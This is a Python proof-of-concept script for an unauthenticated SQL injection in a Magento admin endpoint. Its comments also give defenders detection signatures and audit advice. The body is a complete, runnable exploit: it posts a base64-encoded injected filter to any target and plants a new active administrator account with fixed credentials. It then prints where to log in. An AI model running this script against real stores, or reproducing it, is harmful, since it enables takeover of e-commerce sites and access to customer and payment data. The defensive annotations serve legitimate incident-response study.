import requests
import base64
import sys

# Proof-of-concept for an unauthenticated request to a Magento admin
# endpoint that ends up executing attacker-supplied SQL. Kept here for
# defenders who need to understand what the request looks like on the
# wire and what it changes in the database.
#
# Usage: <script> <host-or-url>
# Raises IndexError if no argument is given (argv[1] is read unguarded).
target = sys.argv[1]

# Normalise the argument: default to plain http and drop a trailing slash
# so the path below can be appended verbatim.
if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

# The affected endpoint. For detection: POSTs to this path that carry the
# `___directive` and `filter` form fields, from clients without an admin
# session, are the observable signature of this request.
target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

# For demo purposes, I use the same attack as is being used in the wild
#
# What the SQL does (visible from the statements themselves):
#   * builds a password hash in the form MD5(salt + password) + ':' + salt,
#   * inserts a new row into `admin_user` with is_active = 1, and
#   * inserts an `admin_role` row (role_type 'U', parent_id 1) for that user.
# Defensive takeaway: after an incident, audit `admin_user` and `admin_role`
# for rows that were not created through the admin UI (note the placeholder
# firstname/lastname/email values used here).
SQLQUERY="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

# Put the nice readable queries into one line,
# and insert the username:password combination
query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
# The `popularity[field_expr]` value closes the expression the server is
# building (`0);`) and then appends the statements above, i.e. the filter
# field is where the injected SQL travels. It is sent base64-encoded, so
# a WAF or log review has to decode `filter` to see the SQL.
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query).encode()

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
# NOTE(review): no timeout is passed, so the call can block indefinitely
# on an unresponsive host.
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
# `r.ok` only reflects the HTTP status (no 4xx/5xx); it does not confirm
# that any row was inserted, so "WORKED" is not proof of exposure and a
# patched host may still answer 200 here. Verify against the database or
# an actual login attempt rather than trusting this print.
if r.ok:
    print("WORKED")
    print("Check {0}/admin with creds ypwq:123".format(target))
else:
    print("DID NOT WORK")